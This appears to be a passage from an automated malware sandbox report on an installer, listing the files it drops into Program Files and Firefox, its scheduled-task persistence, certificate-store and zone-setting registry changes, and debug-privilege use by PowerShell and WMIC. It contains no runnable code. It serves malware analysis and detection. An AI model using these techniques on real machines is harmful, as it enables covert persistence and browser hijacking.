File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\eGoTKWO.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\IvmlpwM.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\GJYLndIZCDVmz.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\oGdIbQIKIHUn\icKFxew.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\JLdZDm.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\FiwGDIq.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\OghXjcG.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\eeAXify.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\lGlUDQP.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rbzCIowvsKWRrhO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\EXxaHtUqjXkXqVrbU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bcicWGWSPuqTxjDSpV.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\emrEEeoVdUigmulhl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc2686-0000-0000-0000-d01200000000} C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc2686-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
